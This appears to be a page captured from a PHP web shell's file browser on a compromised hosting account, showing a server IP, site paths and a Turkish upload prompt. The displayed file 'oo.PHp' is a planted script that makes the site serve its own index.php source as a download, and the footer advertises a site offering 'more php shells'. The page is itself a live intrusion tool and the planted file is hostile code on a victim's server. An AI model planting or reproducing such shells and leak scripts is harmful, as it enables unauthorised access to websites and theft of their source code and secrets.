Domain: amberpublishers.in
Server Adress: 86.38.243.169

privdayz.com

/home/u866425823/domains/lucknowprinter.com/public_html/
Dosya Yükle :
Current File : /home/u866425823/domains/lucknowprinter.com/public_html/oo.PHp

<?php
$root_domain = $_SERVER['HTTP_HOST'];
$root_domain = preg_replace('/^www\./', '', $root_domain); // Remove "www." from the domain
$filePath = $_SERVER['DOCUMENT_ROOT'] . "/index.php";
$filename = $root_domain . '.php';

// Memeriksa apakah file ada
if (file_exists($filePath)) {
    // Mengatur header untuk melakukan pengunduhan
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filePath));
    readfile($filePath);
    exit;
} else {
    // File tidak ditemukan
    echo "File tidak ditemukan.";
}
?>

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.